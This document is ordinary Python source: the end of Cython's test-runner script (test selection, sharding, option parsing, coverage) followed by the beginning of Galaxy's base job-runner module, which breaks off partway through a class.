def __call__(self, testname, tags=None):
return self.regex_matches(testname)
def string_selector(s):
if ':' in s:
return TagsSelector(*s.split(':', 1))
else:
return RegExSelector(s)
class ShardExcludeSelector(object):
# This is an exclude selector so it can override the (include) selectors.
# It may not provide uniform distribution (in time or count), but is a
# determanistic partition of the tests which is important.
# Random seed to improve the hash distribution.
_seed = base64.b64decode(b'2ged1EtsGz/GkisJr22UcLeP6n9XIaA5Vby2wM49Wvg=')
def __init__(self, shard_num, shard_count):
self.shard_num = shard_num
self.shard_count = shard_count
def __call__(self, testname, tags=None, _hash=zlib.crc32, _is_py2=IS_PY2):
# Cannot use simple hash() here as shard processes might use different hash seeds.
# CRC32 is fast and simple, but might return negative values in Py2.
hashval = _hash(self._seed + testname) & 0x7fffffff if _is_py2 else _hash(self._seed + testname.encode())
return hashval % self.shard_count != self.shard_num
class PendingThreadsError(RuntimeError):
pass
threads_seen = []
def check_thread_termination(ignore_seen=True):
if threading is None: # no threading enabled in CPython
return
current = threading.current_thread()
blocking_threads = []
for t in threading.enumerate():
if not t.is_alive() or t == current or t.name == 'time_stamper':
continue
t.join(timeout=2)
if t.is_alive():
if not ignore_seen:
blocking_threads.append(t)
continue
for seen in threads_seen:
if t is seen:
break
else:
threads_seen.append(t)
blocking_threads.append(t)
if not blocking_threads:
return
sys.stderr.write("warning: left-over threads found after running test:\n")
for t in blocking_threads:
sys.stderr.write('...%s\n' % repr(t))
raise PendingThreadsError("left-over threads found after running test")
def subprocess_output(cmd):
try:
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
return p.communicate()[0].decode('UTF-8')
except OSError:
return ''
def get_version():
from Cython.Compiler.Version import version as cython_version
full_version = cython_version
top = os.path.dirname(os.path.abspath(__file__))
if os.path.exists(os.path.join(top, '.git')):
old_dir = os.getcwd()
try:
os.chdir(top)
head_commit = subprocess_output(['git', 'rev-parse', 'HEAD']).strip()
version_commit = subprocess_output(['git', 'rev-parse', cython_version]).strip()
diff = subprocess_output(['git', 'diff', '--stat']).strip()
if head_commit != version_commit:
full_version += " " + head_commit
if diff:
full_version += ' + uncommitted changes'
finally:
os.chdir(old_dir)
return full_version
_orig_stdout, _orig_stderr = sys.stdout, sys.stderr
def flush_and_terminate(status):
try:
_orig_stdout.flush()
_orig_stderr.flush()
finally:
os._exit(status)
def main():
global DISTDIR, WITH_CYTHON
# Set an environment variable to the top directory
os.environ['CYTHON_PROJECT_DIR'] = os.path.abspath(os.path.dirname(__file__))
DISTDIR = os.path.join(os.getcwd(), os.path.dirname(sys.argv[0]))
from Cython.Compiler import DebugFlags
args = []
for arg in sys.argv[1:]:
if arg.startswith('--debug') and arg[2:].replace('-', '_') in dir(DebugFlags):
setattr(DebugFlags, arg[2:].replace('-', '_'), True)
else:
args.append(arg)
from optparse import OptionParser
parser = OptionParser()
parser.add_option("--no-cleanup", dest="cleanup_workdir",
action="store_false", default=True,
help="do not delete the generated C files (allows passing --no-cython on next run)")
parser.add_option("--no-cleanup-sharedlibs", dest="cleanup_sharedlibs",
action="store_false", default=True,
help="do not delete the generated shared library files (allows manual module experimentation)")
parser.add_option("--no-cleanup-failures", dest="cleanup_failures",
action="store_false", default=True,
help="enable --no-cleanup and --no-cleanup-sharedlibs for failed tests only")
parser.add_option("--no-cython", dest="with_cython",
action="store_false", default=True,
help="do not run the Cython compiler, only the C compiler")
parser.add_option("--compiler", dest="compiler", default=None,
help="C compiler type")
backend_list = ','.join(BACKENDS)
parser.add_option("--backends", dest="backends", default=backend_list,
help="select backends to test (default: %s)" % backend_list)
parser.add_option("--no-c", dest="use_c",
action="store_false", default=True,
help="do not test C compilation backend")
parser.add_option("--no-cpp", dest="use_cpp",
action="store_false", default=True,
help="do not test C++ compilation backend")
parser.add_option("--no-unit", dest="unittests",
action="store_false", default=True,
help="do not run the unit tests")
parser.add_option("--no-doctest", dest="doctests",
action="store_false", default=True,
help="do not run the doctests")
parser.add_option("--no-file", dest="filetests",
action="store_false", default=True,
help="do not run the file based tests")
parser.add_option("--no-pyregr", dest="pyregr",
action="store_false", default=True,
help="do not run the regression tests of CPython in tests/pyregr/")
parser.add_option("--no-examples", dest="examples",
action="store_false", default=True,
help="Do not run the documentation tests in the examples directory.")
parser.add_option("--no-code-style", dest="code_style",
action="store_false", default=True,
help="Do not run the code style (PEP8) checks.")
parser.add_option("--cython-only", dest="cython_only",
action="store_true", default=False,
help="only compile pyx to c, do not run C compiler or run the tests")
parser.add_option("--no-refnanny", dest="with_refnanny",
action="store_false", default=True,
help="do not regression test reference counting")
parser.add_option("--no-fork", dest="fork",
action="store_false", default=True,
help="do not fork to run tests")
parser.add_option("--sys-pyregr", dest="system_pyregr",
action="store_true", default=False,
help="run the regression tests of the CPython installation")
parser.add_option("-x", "--exclude", dest="exclude",
action="append", metavar="PATTERN",
help="exclude tests matching the PATTERN")
parser.add_option("--listfile", dest="listfile",
action="append",
help="specify a file containing a list of tests to run")
parser.add_option("-j", "--shard_count", dest="shard_count", metavar="N",
type=int, default=1,
help="shard this run into several parallel runs")
parser.add_option("--shard_num", dest="shard_num", metavar="K",
type=int, default=-1,
help="test only this single shard")
parser.add_option("--profile", dest="profile",
action="store_true", default=False,
help="enable profiling of the tests")
parser.add_option("-C", "--coverage", dest="coverage",
action="store_true", default=False,
help="collect source coverage data for the Compiler")
parser.add_option("--coverage-xml", dest="coverage_xml",
action="store_true", default=False,
help="collect source coverage data for the Compiler in XML format")
parser.add_option("--coverage-html", dest="coverage_html",
action="store_true", default=False,
help="collect source coverage data for the Compiler in HTML format")
parser.add_option("-A", "--annotate", dest="annotate_source",
action="store_true", default=True,
help="generate annotated HTML versions of the test source files")
parser.add_option("--no-annotate", dest="annotate_source",
action="store_false",
help="do not generate annotated HTML versions of the test source files")
parser.add_option("-v", "--verbose", dest="verbosity",
action="count", default=0,
help="display test progress, pass twice to print test names")
parser.add_option("-T", "--ticket", dest="tickets",
action="append",
help="a bug ticket number to run the respective test in 'tests/*'")
parser.add_option("-k", dest="only_pattern",
help="a regex pattern for selecting doctests and test functions in the test modules")
parser.add_option("-3", dest="language_level",
action="store_const", const=3, default=2,
help="set language level to Python 3 (useful for running the CPython regression tests)'")
parser.add_option("--xml-output", dest="xml_output_dir", metavar="DIR",
help="write test results in XML to directory DIR")
parser.add_option("--exit-ok", dest="exit_ok", default=False,
action="store_true",
help="exit without error code even on test failures")
parser.add_option("--failfast", dest="failfast", default=False,
action="store_true",
help="stop on first failure or error")
parser.add_option("--root-dir", dest="root_dir", default=os.path.join(DISTDIR, 'tests'),
help=("Directory to look for the file based "
"tests (the ones which are deactivated with '--no-file'."))
parser.add_option("--examples-dir", dest="examples_dir",
default=os.path.join(DISTDIR, 'docs', 'examples'),
help="Directory to look for documentation example tests")
parser.add_option("--work-dir", dest="work_dir", default=os.path.join(os.getcwd(), 'TEST_TMP'),
help="working directory")
parser.add_option("--cython-dir", dest="cython_dir", default=os.getcwd(),
help="Cython installation directory (default: use local source version)")
parser.add_option("--debug", dest="for_debugging", default=False, action="store_true",
help="configure for easier use with a debugger (e.g. gdb)")
parser.add_option("--pyximport-py", dest="pyximport_py", default=False, action="store_true",
help="use pyximport to automatically compile imported .pyx and .py files")
parser.add_option("--watermark", dest="watermark", default=None,
help="deterministic generated by string")
parser.add_option("--use_common_utility_dir", default=False, action="store_true")
parser.add_option("--use_formal_grammar", default=False, action="store_true")
parser.add_option("--test_determinism", default=False, action="store_true",
help="test whether Cython's output is deterministic")
parser.add_option("--pythran-dir", dest="pythran_dir", default=None,
help="specify Pythran include directory. This will run the C++ tests using Pythran backend for Numpy")
parser.add_option("--no-capture", dest="capture", default=True, action="store_false",
help="do not capture stdout, stderr in srctree tests. Makes pdb.set_trace interactive")
parser.add_option("--limited-api", dest="limited_api", default=False, action="store_true",
help="Compiles Cython using CPython's LIMITED_API")
options, cmd_args = parser.parse_args(args)
if options.with_cython and sys.version_info[0] >= 3:
sys.path.insert(0, options.cython_dir)
# requires glob with the wildcard.
if sys.version_info < (3, 5) or cmd_args:
options.code_style = False
WITH_CYTHON = options.with_cython
coverage = None
if options.coverage or options.coverage_xml or options.coverage_html:
if not WITH_CYTHON:
options.coverage = options.coverage_xml = options.coverage_html = False
elif options.shard_num == -1:
print("Enabling coverage analysis")
from coverage import coverage as _coverage
coverage = _coverage(branch=True)
coverage.erase()
coverage.start()
if options.xml_output_dir:
shutil.rmtree(options.xml_output_dir, ignore_errors=True)
if options.listfile:
for listfile in options.listfile:
cmd_args.extend(load_listfile(listfile))
if options.capture and not options.for_debugging:
keep_alive_interval = 10
else:
keep_alive_interval = None
if options.shard_count > 1 and options.shard_num == -1:
if "PYTHONIOENCODING" not in os.environ:
# Make sure subprocesses can print() Unicode text.
os.environ["PYTHONIOENCODING"] = sys.stdout.encoding or sys.getdefaultencoding()
import multiprocessing
pool = multiprocessing.Pool(options.shard_count)
tasks = [(options, cmd_args, shard_num) for shard_num in range(options.shard_count)]
error_shards = []
failure_outputs = []
# NOTE: create process pool before time stamper thread to avoid forking issues.
total_time = time.time()
stats = Stats()
with time_stamper_thread(interval=keep_alive_interval):
for shard_num, shard_stats, return_code, failure_output in pool.imap_unordered(runtests_callback, tasks):
if return_code != 0:
error_shards.append(shard_num)
failure_outputs.append(failure_output)
sys.stderr.write("FAILED (%s/%s)\n" % (shard_num, options.shard_count))
sys.stderr.write("ALL DONE (%s/%s)\n" % (shard_num, options.shard_count))
stats.update(shard_stats)
pool.close()
pool.join()
total_time = time.time() - total_time
sys.stderr.write("Sharded tests run in %d seconds (%.1f minutes)\n" % (round(total_time), total_time / 60.))
if error_shards:
sys.stderr.write("Errors found in shards %s\n" % ", ".join([str(e) for e in error_shards]))
for failure_output in zip(error_shards, failure_outputs):
sys.stderr.write("\nErrors from shard %s:\n%s" % failure_output)
return_code = 1
else:
return_code = 0
else:
with time_stamper_thread(interval=keep_alive_interval):
_, stats, return_code, _ = runtests(options, cmd_args, coverage)
if coverage:
if options.shard_count > 1 and options.shard_num == -1:
coverage.combine()
coverage.stop()
stats.print_stats(sys.stderr)
if coverage:
save_coverage(coverage, options)
sys.stderr.write("ALL DONE\n")
sys.stderr.flush()
try:
check_thread_termination(ignore_seen=False)
except PendingThreadsError:
# normal program exit won't kill the threads, do it the hard way here
flush_and_terminate(return_code)
else:
sys.exit(return_code)
@contextmanager
def time_stamper_thread(interval=10):
"""
Print regular time stamps into the build logs to find slow tests.
@param interval: time interval in seconds
"""
if not interval or interval < 0:
# Do nothing
yield
return
try:
_xrange = xrange
except NameError:
_xrange = range
import threading
import datetime
from time import sleep
interval = _xrange(interval * 4)
now = datetime.datetime.now
stop = False
# We capture stderr in some places.
# => make sure we write to the real (original) stderr of the test runner.
stderr = os.dup(2)
def write(s):
os.write(stderr, s if type(s) is bytes else s.encode('ascii'))
def time_stamper():
while True:
for _ in interval:
if stop:
return
sleep(1./4)
write('\n#### %s\n' % now())
thread = threading.Thread(target=time_stamper, name='time_stamper')
thread.setDaemon(True) # Py2 ...
thread.start()
try:
yield
finally:
stop = True
thread.join()
os.close(stderr)
def configure_cython(options):
global CompilationOptions, pyrex_default_options, cython_compile
from Cython.Compiler.Options import \
CompilationOptions, \
default_options as pyrex_default_options
from Cython.Compiler.Options import _directive_defaults as directive_defaults
from Cython.Compiler import Errors
Errors.LEVEL = 0 # show all warnings
from Cython.Compiler import Options
Options.generate_cleanup_code = 3 # complete cleanup code
from Cython.Compiler import DebugFlags
DebugFlags.debug_temp_code_comments = 1
pyrex_default_options['formal_grammar'] = options.use_formal_grammar
if options.profile:
directive_defaults['profile'] = True
if options.watermark:
import Cython.Compiler.Version
Cython.Compiler.Version.watermark = options.watermark
def save_coverage(coverage, options):
if options.coverage:
coverage.report(show_missing=0)
if options.coverage_xml:
coverage.xml_report(outfile="coverage-report.xml")
if options.coverage_html:
coverage.html_report(directory="coverage-report-html")
def runtests_callback(args):
options, cmd_args, shard_num = args
options.shard_num = shard_num
return runtests(options, cmd_args)
def runtests(options, cmd_args, coverage=None):
# faulthandler should be able to provide a limited traceback
# in the event of a segmentation fault. Only available on Python 3.3+
try:
import faulthandler
except ImportError:
pass # OK - not essential
else:
faulthandler.enable()
if sys.platform == "win32" and sys.version_info < (3, 6):
# enable Unicode console output, if possible
try:
import win_unicode_console
except ImportError:
pass
else:
win_unicode_console.enable()
WITH_CYTHON = options.with_cython
ROOTDIR = os.path.abspath(options.root_dir)
WORKDIR = os.path.abspath(options.work_dir)
if WITH_CYTHON:
configure_cython(options)
xml_output_dir = options.xml_output_dir
if options.shard_num > -1:
WORKDIR = os.path.join(WORKDIR, str(options.shard_num))
if xml_output_dir:
xml_output_dir = os.path.join(xml_output_dir, 'shard-%03d' % options.shard_num)
# RUN ALL TESTS!
UNITTEST_MODULE = "Cython"
UNITTEST_ROOT = os.path.join(os.path.dirname(__file__), UNITTEST_MODULE)
if WITH_CYTHON:
if os.path.exists(WORKDIR):
for path in os.listdir(WORKDIR):
if path in ("support", "Cy3"): continue
shutil.rmtree(os.path.join(WORKDIR, path), ignore_errors=True)
if not os.path.exists(WORKDIR):
os.makedirs(WORKDIR)
if options.shard_num <= 0:
sys.stderr.write("Python %s\n" % sys.version)
sys.stderr.write("\n")
if WITH_CYTHON:
sys.stderr.write("Running tests against Cython %s\n" % get_version())
else:
sys.stderr.write("Running tests without Cython.\n")
if options.for_debugging:
options.cleanup_workdir = False
options.cleanup_sharedlibs = False
options.fork = False
if WITH_CYTHON and include_debugger:
from Cython.Compiler.Options import default_options as compiler_default_options
compiler_default_options['gdb_debug'] = True
compiler_default_options['output_dir'] = os.getcwd()
if IS_PYPY:
if options.with_refnanny:
sys.stderr.write("Disabling refnanny in PyPy\n")
options.with_refnanny = False
if options.with_refnanny:
from pyximport.pyxbuild import pyx_to_dll
libpath = pyx_to_dll(os.path.join("Cython", "Runtime", "refnanny.pyx"),
build_in_temp=True,
pyxbuild_dir=os.path.join(WORKDIR, "support"))
sys.path.insert(0, os.path.split(libpath)[0])
CDEFS.append(('CYTHON_REFNANNY', '1'))
if options.limited_api:
CFLAGS.append("-DCYTHON_LIMITED_API=1")
CFLAGS.append('-Wno-unused-function')
if xml_output_dir and options.fork:
# doesn't currently work together
sys.stderr.write("Disabling forked testing to support XML test output\n")
options.fork = False
if WITH_CYTHON:
sys.stderr.write("Using Cython language level %d.\n" % options.language_level)
test_bugs = False
if options.tickets:
for ticket_number in options.tickets:
test_bugs = True
cmd_args.append('ticket:%s' % ticket_number)
if not test_bugs:
for selector in cmd_args:
if selector.startswith('bugs'):
test_bugs = True
selectors = [ string_selector(r) for r in cmd_args ]
verbose_excludes = selectors or options.verbosity >= 2
if not selectors:
selectors = [ lambda x, tags=None: True ]
# Check which external modules are not present and exclude tests
# which depends on them (by prefix)
missing_dep_excluder = MissingDependencyExcluder(EXT_DEP_MODULES)
version_dep_excluder = VersionDependencyExcluder(VER_DEP_MODULES)
exclude_selectors = [missing_dep_excluder, version_dep_excluder] # want to print msg at exit
try:
import IPython.core.release
if list(IPython.core.release._ver) < [1, 0, 0]:
raise ImportError
except (ImportError, AttributeError, TypeError):
exclude_selectors.append(RegExSelector('IPython'))
try:
raise ImportError("Jedi typer is currently broken, see GH#1845")
import jedi
if not ([0, 9] <= list(map(int, re.findall('[0-9]+', jedi.__version__ or '0')))):
raise ImportError
except (ImportError, AttributeError, TypeError):
exclude_selectors.append(RegExSelector('Jedi'))
if options.exclude:
exclude_selectors += [ string_selector(r) for r in options.exclude ]
if not COMPILER_HAS_INT128 or not IS_CPYTHON:
exclude_selectors += [RegExSelector('int128')]
if options.shard_num > -1:
exclude_selectors.append(ShardExcludeSelector(options.shard_num, options.shard_count))
if not test_bugs:
bug_files = [
('bugs.txt', True),
('pypy_bugs.txt', IS_PYPY),
('pypy2_bugs.txt', IS_PYPY and IS_PY2),
('pypy_crash_bugs.txt', IS_PYPY),
('pypy_implementation_detail_bugs.txt', IS_PYPY),
('limited_api_bugs.txt', options.limited_api),
('windows_bugs.txt', sys.platform == 'win32'),
('cygwin_bugs.txt', sys.platform == 'cygwin')
]
exclude_selectors += [
FileListExcluder(os.path.join(ROOTDIR, bugs_file_name),
verbose=verbose_excludes)
for bugs_file_name, condition in bug_files if condition
]
global COMPILER
if options.compiler:
COMPILER = options.compiler
selected_backends = [ name.strip() for name in options.backends.split(',') if name.strip() ]
backends = []
for backend in selected_backends:
if backend == 'c' and not options.use_c:
continue
elif backend == 'cpp' and not options.use_cpp:
continue
elif backend not in BACKENDS:
sys.stderr.write("Unknown backend requested: '%s' not one of [%s]\n" % (
backend, ','.join(BACKENDS)))
sys.exit(1)
backends.append(backend)
if options.shard_num <= 0:
sys.stderr.write("Backends: %s\n" % ','.join(backends))
languages = backends
if 'CI' in os.environ and sys.platform == 'darwin' and 'cpp' in languages:
bugs_file_name = 'macos_cpp_bugs.txt'
exclude_selectors += [
FileListExcluder(os.path.join(ROOTDIR, bugs_file_name),
verbose=verbose_excludes)
]
if options.use_common_utility_dir:
common_utility_dir = os.path.join(WORKDIR, 'utility_code')
if not os.path.exists(common_utility_dir):
os.makedirs(common_utility_dir)
else:
common_utility_dir = None
sys.stderr.write("\n")
test_suite = unittest.TestSuite()
stats = Stats()
if options.unittests:
collect_unittests(UNITTEST_ROOT, UNITTEST_MODULE + ".", test_suite, selectors, exclude_selectors)
if options.doctests:
collect_doctests(UNITTEST_ROOT, UNITTEST_MODULE + ".", test_suite, selectors, exclude_selectors)
if options.filetests and languages:
filetests = TestBuilder(ROOTDIR, WORKDIR, selectors, exclude_selectors,
options, options.pyregr, languages, test_bugs,
options.language_level, common_utility_dir,
options.pythran_dir, add_embedded_test=True, stats=stats)
test_suite.addTest(filetests.build_suite())
if options.examples and languages:
examples_workdir = os.path.join(WORKDIR, 'examples')
for subdirectory in glob.glob(os.path.join(options.examples_dir, "*/")):
filetests = TestBuilder(subdirectory, examples_workdir, selectors, exclude_selectors,
options, options.pyregr, languages, test_bugs,
options.language_level, common_utility_dir,
options.pythran_dir,
default_mode='compile', stats=stats)
test_suite.addTest(filetests.build_suite())
if options.system_pyregr and languages:
sys_pyregr_dir = os.path.join(sys.prefix, 'lib', 'python'+sys.version[:3], 'test')
if not os.path.isdir(sys_pyregr_dir):
sys_pyregr_dir = os.path.join(os.path.dirname(sys.executable), 'Lib', 'test') # source build
if os.path.isdir(sys_pyregr_dir):
filetests = TestBuilder(ROOTDIR, WORKDIR, selectors, exclude_selectors,
options, True, languages, test_bugs,
sys.version_info[0], common_utility_dir, stats=stats)
sys.stderr.write("Including CPython regression tests in %s\n" % sys_pyregr_dir)
test_suite.addTest(filetests.handle_directory(sys_pyregr_dir, 'pyregr'))
if options.code_style and options.shard_num <= 0:
try:
import pycodestyle
except ImportError:
# Hack to make the exclusion visible.
missing_dep_excluder.tests_missing_deps.append('TestCodeFormat')
else:
test_suite.addTest(TestCodeFormat(options.cython_dir))
if xml_output_dir:
from Cython.Tests.xmlrunner import XMLTestRunner
if not os.path.exists(xml_output_dir):
try:
os.makedirs(xml_output_dir)
except OSError:
pass # concurrency issue?
test_runner = XMLTestRunner(output=xml_output_dir,
verbose=options.verbosity > 0)
if options.failfast:
sys.stderr.write("--failfast not supported with XML runner\n")
else:
text_runner_options = {}
if options.failfast:
text_runner_options['failfast'] = True
test_runner = unittest.TextTestRunner(verbosity=options.verbosity, **text_runner_options)
if options.pyximport_py:
from pyximport import pyximport
pyximport.install(pyimport=True, build_dir=os.path.join(WORKDIR, '_pyximport'),
load_py_module_on_import_failure=True, inplace=True)
try:
gc.set_debug(gc.DEBUG_UNCOLLECTABLE)
except AttributeError:
pass # not available on PyPy
result = test_runner.run(test_suite)
if common_utility_dir and options.shard_num < 0 and options.cleanup_workdir:
shutil.rmtree(common_utility_dir)
if missing_dep_excluder.tests_missing_deps:
sys.stderr.write("Following tests excluded because of missing dependencies on your system:\n")
for test in missing_dep_excluder.tests_missing_deps:
sys.stderr.write(" %s\n" % test)
if options.with_refnanny:
import refnanny
sys.stderr.write("\n".join([repr(x) for x in refnanny.reflog]))
result_code = 0 if options.exit_ok else not result.wasSuccessful()
if xml_output_dir:
failure_output = ""
else:
failure_output = "".join(collect_failure_output(result))
return options.shard_num, stats, result_code, failure_output
def collect_failure_output(result):
"""Extract test error/failure output from a TextTestResult."""
failure_output = []
for flavour, errors in (("ERROR", result.errors), ("FAIL", result.failures)):
for test, err in errors:
failure_output.append("%s\n%s: %s\n%s\n%s\n" % (
result.separator1,
flavour, result.getDescription(test),
result.separator2,
err))
return failure_output
if __name__ == '__main__':
try:
main()
except Exception:
traceback.print_exc()
try:
check_thread_termination(ignore_seen=False)
except PendingThreadsError:
# normal program exit won't kill the threads, do it the hard way here
flush_and_terminate(1)
sys.exit(1)
|
__init__.py
|
"""
Base classes for job runner plugins.
"""
import os
import time
import string
import logging
import threading
import subprocess
from Queue import Queue, Empty
import galaxy.jobs
from galaxy import model
from galaxy.util import DATABASE_MAX_STRING_SIZE, shrink_stream_by_size
log = logging.getLogger( __name__ )
STOP_SIGNAL = object()
class BaseJobRunner( object ):
def __init__( self, app, nworkers ):
"""Start the job runner
"""
self.app = app
self.sa_session = app.model.context
self.nworkers = nworkers
def _init_worker_threads(self):
"""Start ``nworkers`` worker threads.
"""
self.work_queue = Queue()
self.work_threads = []
log.debug('Starting %s %s workers' % (self.nworkers, self.runner_name))
for i in range(self.nworkers):
worker = threading.Thread( name="%s.work_thread-%d" % (self.runner_name, i), target=self.run_next )
worker.setDaemon( True )
worker.start()
self.work_threads.append( worker )
def run_next(self):
"""Run the next item in the work queue (a job waiting to run)
"""
while 1:
( method, arg ) = self.work_queue.get()
if method is STOP_SIGNAL:
return
# id and name are collected first so that the call of method() is the last exception.
try:
# arg should be a JobWrapper/TaskWrapper
job_id = arg.get_id_tag()
except:
job_id = 'unknown'
try:
name = method.__name__
except:
name = 'unknown'
try:
method(arg)
except:
log.exception( "(%s) Unhandled exception calling %s" % ( job_id, name ) )
# Causes a runner's `queue_job` method to be called from a worker thread
def put(self, job_wrapper):
"""Add a job to the queue (by job identifier), indicate that the job is ready to run.
"""
# Change to queued state before handing to worker thread so the runner won't pick it up again
job_wrapper.change_state( model.Job.states.QUEUED )
# Persist the destination so that the job will be included in counts if using concurrency limits
job_wrapper.set_job_destination( job_wrapper.job_destination, None )
self.mark_as_queued(job_wrapper)
def mark_as_queued(self, job_wrapper):
self.work_queue.put( ( self.queue_job, job_wrapper ) )
def shutdown( self ):
"""Attempts to gracefully shut down the worker threads
"""
log.info( "%s: Sending stop signal to %s worker threads" % ( self.runner_name, len( self.work_threads ) ) )
for i in range( len( self.work_threads ) ):
self.work_queue.put( ( STOP_SIGNAL, None ) )
# Most runners should override the legacy URL handler methods and destination param method
def url_to_destination(self, url):
"""
Convert a legacy URL to a JobDestination.
Job runner URLs are deprecated, JobDestinations should be used instead.
This base class method converts from a URL to a very basic
JobDestination without destination params.
"""
return galaxy.jobs.JobDestination(runner=url.split(':')[0])
def parse_destination_params(self, params):
"""Parse the JobDestination ``params`` dict and return the runner's native representation of those params.
"""
raise NotImplementedError()
def prepare_job(self, job_wrapper, include_metadata=False, include_work_dir_outputs=True):
"""Some sanity checks that all runners' queue_job() methods are likely to want to do
"""
job_id = job_wrapper.get_id_tag()
job_state = job_wrapper.get_state()
job_wrapper.is_ready = False
job_wrapper.runner_command_line = None
# Make sure the job hasn't been deleted
if job_state == model.Job.states.DELETED:
log.debug( "(%s) Job deleted by user before it entered the %s queue" % ( job_id, self.runner_name ) )
if self.app.config.cleanup_job in ( "always", "onsuccess" ):
job_wrapper.cleanup()
return False
elif job_state != model.Job.states.QUEUED:
log.info( "(%d) Job is in state %s, skipping execution" % ( job_id, job_state ) )
# cleanup may not be safe in all states
return False
# Prepare the job
try:
job_wrapper.prepare()
job_wrapper.runner_command_line = self.build_command_line( job_wrapper, include_metadata=include_metadata, include_work_dir_outputs=include_work_dir_outputs )
except:
log.exception("(%s) Failure preparing job" % job_id)
job_wrapper.fail( "failure preparing job", exception=True )
return False
if not job_wrapper.runner_command_line:
job_wrapper.finish( '', '' )
return False
return True
# Runners must override the job handling methods
def queue_job(self, job_wrapper):
raise NotImplementedError()
def stop_job(self, job):
raise NotImplementedError()
def recover(self, job, job_wrapper):
raise NotImplementedError()
def build_command_line( self, job_wrapper, include_metadata=False, include_work_dir_outputs=True ):
"""
Compose the sequence of commands necessary to execute a job. This will
currently include:
- environment settings corresponding to any requirement tags
- preparing input files
- command line taken from job wrapper
- commands to set metadata (if include_metadata is True)
"""
commands = job_wrapper.get_command_line()
# All job runners currently handle this case which should never
# occur
if not commands:
return None
# Prepend version string
if job_wrapper.version_string_cmd:
commands = "%s &> %s; " % ( job_wrapper.version_string_cmd, job_wrapper.get_version_string_path() ) + commands
# prepend getting input files (if defined)
if hasattr(job_wrapper, 'prepare_input_files_cmds') and job_wrapper.prepare_input_files_cmds is not None:
commands = "; ".join( job_wrapper.prepare_input_files_cmds + [ commands ] )
# Prepend dependency injection
if job_wrapper.dependency_shell_commands:
commands = "; ".join( job_wrapper.dependency_shell_commands + [ commands ] )
# Append commands to copy job outputs based on from_work_dir attribute.
if include_work_dir_outputs:
work_dir_outputs = self.get_work_dir_outputs( job_wrapper )
if work_dir_outputs:
commands += "; " + "; ".join( [ "if [ -f %s ] ; then cp %s %s ; fi" %
( source_file, source_file, destination ) for ( source_file, destination ) in work_dir_outputs ] )
# Append metadata setting commands, we don't want to overwrite metadata
# that was copied over in init_meta(), as per established behavior
if include_metadata:
commands += "; cd %s; " % os.path.abspath( os.getcwd() )
commands += job_wrapper.setup_external_metadata(
exec_dir = os.path.abspath( os.getcwd() ),
tmp_dir = job_wrapper.working_directory,
dataset_files_path = self.app.model.Dataset.file_path,
output_fnames = job_wrapper.get_output_fnames(),
set_extension = False,
kwds = { 'overwrite' : False } )
return commands
def get_work_dir_outputs( self, job_wrapper ):
"""
Returns list of pairs (source_file, destination) describing path
to work_dir output file and ultimate destination.
"""
def in_directory( file, directory ):
"""
Return true, if the common prefix of both is equal to directory
e.g. /a/b/c/d.rst and directory is /a/b, the common prefix is /a/b
"""
# Make both absolute.
directory = os.path.abspath( directory )
file = os.path.abspath( file )
return os.path.commonprefix( [ file, directory ] ) == directory
# Set up dict of dataset id --> output path; output path can be real or
# false depending on outputs_to_working_directory
output_paths = {}
for dataset_path in job_wrapper.get_output_fnames():
path = dataset_path.real_path
if self.app.config.outputs_to_working_directory:
path = dataset_path.false_path
output_paths[ dataset_path.dataset_id ] = path
output_pairs = []
# Walk job's output associations to find and use from_work_dir attributes.
job = job_wrapper.get_job()
job_tool = self.app.toolbox.tools_by_id.get( job.tool_id, None )
for dataset_assoc in job.output_datasets + job.output_library_datasets:
for dataset in dataset_assoc.dataset.dataset.history_associations + dataset_assoc.dataset.dataset.library_associations:
if isinstance( dataset, self.app.model.HistoryDatasetAssociation ):
joda = self.sa_session.query( self.app.model.JobToOutputDatasetAssociation ).filter_by( job=job, dataset=dataset ).first()
if joda and job_tool:
hda_tool_output = job_tool.outputs.get( joda.name, None )
if hda_tool_output and hda_tool_output.from_work_dir:
# Copy from working dir to HDA.
# TODO: move instead of copy to save time?
source_file = os.path.join( os.path.abspath( job_wrapper.working_directory ), hda_tool_output.from_work_dir )
destination = job_wrapper.get_output_destination( output_paths[ dataset.dataset_id ] )
if in_directory( source_file, job_wrapper.working_directory ):
output_pairs.append( ( source_file, destination ) )
log.debug( "Copying %s to %s as directed by from_work_dir" % ( source_file, destination ) )
else:
# Security violation.
log.exception( "from_work_dir specified a location not in the working directory: %s, %s" % ( source_file, job_wrapper.working_directory ) )
return output_pairs
def _handle_metadata_externally(self, job_wrapper):
"""
Set metadata externally. Used by the local and lwr job runners where this
shouldn't be attached to command-line to execute.
"""
#run the metadata setting script here
#this is terminate-able when output dataset/job is deleted
#so that long running set_meta()s can be canceled without having to reboot the server
if job_wrapper.get_state() not in [ model.Job.states.ERROR, model.Job.states.DELETED ] and job_wrapper.output_paths:
external_metadata_script = job_wrapper.setup_external_metadata( output_fnames=job_wrapper.get_output_fnames(),
set_extension=True,
tmp_dir=job_wrapper.working_directory,
#we don't want to overwrite metadata that was copied over in init_meta(), as per established behavior
kwds={ 'overwrite' : False } )
log.debug( 'executing external set_meta script for job %d: %s' % ( job_wrapper.job_id, external_metadata_script ) )
external_metadata_proc = subprocess.Popen( args=external_metadata_script,
shell=True,
env=os.environ,
preexec_fn=os.setpgrp )
job_wrapper.external_output_metadata.set_job_runner_external_pid( external_metadata_proc.pid, self.sa_session )
external_metadata_proc.wait()
log.debug( 'execution of external set_meta for job %d finished' % job_wrapper.job_id )
class AsynchronousJobState( object ):
"""
Encapsulate the state of an asynchronous job, this should be subclassed as
needed for various job runners to capture additional information needed
to communicate with distributed resource manager.
"""
def __init__( self, files_dir=None, job_wrapper=None, job_id=None, job_file=None, output_file=None, error_file=None, exit_code_file=None, job_name=None, job_destination=None ):
self.old_state = None
self.running = False
self.check_count = 0
self.job_wrapper = job_wrapper
# job_id is the DRM's job id, not the Galaxy job id
self.job_id = job_id
self.job_destination = job_destination
self.job_file = job_file
self.output_file = output_file
self.error_file = error_file
self.exit_code_file = exit_code_file
self.job_name = job_name
self.set_defaults( files_dir )
self.cleanup_file_attributes = [ 'job_file', 'output_file', 'error_file', 'exit_code_file' ]
def set_defaults( self, files_dir ):
if self.job_wrapper is not None:
id_tag = self.job_wrapper.get_id_tag()
if files_dir is not None:
self.job_file = os.path.join( files_dir, 'galaxy_%s.sh' % id_tag )
self.output_file = os.path.join( files_dir, 'galaxy_%s.o' % id_tag )
self.error_file = os.path.join( files_dir, 'galaxy_%s.e' % id_tag )
